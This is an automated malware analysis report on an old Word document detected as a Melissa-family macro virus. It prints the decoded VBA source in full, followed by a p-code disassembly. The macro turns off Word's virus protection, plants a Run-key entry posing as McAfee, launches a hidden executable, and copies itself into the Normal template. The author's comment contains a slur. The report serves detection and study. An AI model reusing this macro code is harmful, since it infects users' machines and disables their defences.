Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18ec97f10602be1e…

MALICIOUS

Office (OLE)

Size: 34.5 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 19ba3d4a90de72e05786c4dffcad5f54
SHA-1: 2ac9d388be2da5f1f8d53c6b5eaba14cbb12e248
SHA-256: 18ec97f10602be1eda1387d66fb0961ceba247f769f8b7695392e867cc6cd4a8
Risk Score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample contains a VBA macro that executes upon opening the document. This macro attempts to copy a file from 'a:\msdos.bak' to 'c:\windows\system\vshield.exe' and then execute it. It also attempts to add an entry to the Run key for persistence. The ClamAV detection 'Doc.Trojan.Melissa-25' strongly suggests a known malicious family, but specific attribution is not possible from the provided evidence.

Heuristics (5)

  • ClamAV: Doc.Trojan.Melissa-25 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Melissa-25
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  6880 bytes
SHA-256: 148758c8df5efd9acbbf5bf9137c213bd23336c023d42bb287998e90d4915921
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "money99"
Attribute VB_Base = "1Normal.money99"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Dim source, dest

CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)

If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Mcafee VShield") <> "c:\windows\system\vshield.exe" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Mcafee VShield") = "c:\windows\system\vshield.exe"

source = "a:\msdos.bak"
dest = "c:\windows\system\vshield.exe"
FileCopy source, dest
SetAttr dest, vbHidden
Shell dest

Else

source = "c:\windows\system\vshield.exe"
dest = "a:\msdos.bak"
FileCopy source, dest
SetAttr dest, vbHidden
End If

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

NTlnCnt = NT.CodeModule.CountOfLines
ADlnCnt = AD.CodeModule.CountOfLines
Start = 1

If NT.Name <> "money99" Then
    If NTlnCnt > 0 Then NT.CodeModule.DeleteLines 1, NTlnCnt
    NT.Name = "money99"
    
    Do While AD.CodeModule.Lines(Start, 1) <> "'Done"
        NT.CodeModule.InsertLines Start, AD.CodeModule.Lines(Start, 1)
        Start = Start + 1
    Loop
    NT.CodeModule.InsertLines NT.CodeModule.CountOfLines + 1, "'Done"
    
ElseIf AD.Name <> "money99" Then
    If ADlnCnt > 0 Then AD.CodeModule.DeleteLines 1, ADlnCnt
    AD.Name = "money99"
    
    Do While NT.CodeModule.Lines(Start, 1) <> "'Done"
        AD.CodeModule.InsertLines Start, NT.CodeModule.Lines(Start, 1)
        Start = Start + 1
    Loop
    AD.CodeModule.InsertLines AD.CodeModule.CountOfLines + 1, "'Done"
End If

End Sub
'Mcafee blows; mail suggestions/improvements to anon15773@hushmail.com
'Shout out to ma nigga Sketch
'Done

' Processing file: /opt/analyzer/scan_staging/b290ff877cb2429982d8d9e649ab3753.bin
' ===============================================================================
' Module streams:
' Macros/VBA/money99 - 3931 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Dim 
' 	VarDefn source
' 	VarDefn dest
' Line #3:
' Line #4:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #5:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' Line #7:
' 	LitStr 0x0000 ""
' 	LitStr 0x0040 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
' 	LitStr 0x000E "Mcafee VShield"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x001D "c:\windows\system\vshield.exe"
' 	Ne 
' 	IfBlock 
' Line #8:
' 	LitStr 0x001D "c:\windows\system\vshield.exe"
' 	LitStr 0x0000 ""
' 	LitStr 0x0040 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
' 	LitStr 0x000E "Mcafee VShield"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #9:
' Line #10:
' 	LitStr 0x000C "a:\msdos.bak"
' 	St source 
' Line #11:
' 	LitStr 0x001D "c:\windows\system\vshield.exe"
' 	St dest 
' Line #12:
' 	Ld source 
' 	Ld dest 
' 	ArgsCall FileCopy 0x0002 
' Line #13:
' 	Ld dest 
' 	Ld vbHidden 
' 	ArgsCall SetAttr 0x0002 
' Line #14:
' 	Ld dest 
' 	ArgsCall Shell 0x0001 
' Line #15:
' Line #16:
' 	ElseBlock 
' Line #17:
' Line #18:
' 	LitStr 0x001D "c:\windows\system\vshield.exe"
' 	St source 
' Line #19:
' 	LitStr 0x000C "a:\msdos.bak"
' 	St dest 
' Line #20:
' 	Ld source 
' 	Ld dest 
' 	ArgsCall FileCopy 0x0002 
' Line #21:
... (truncated)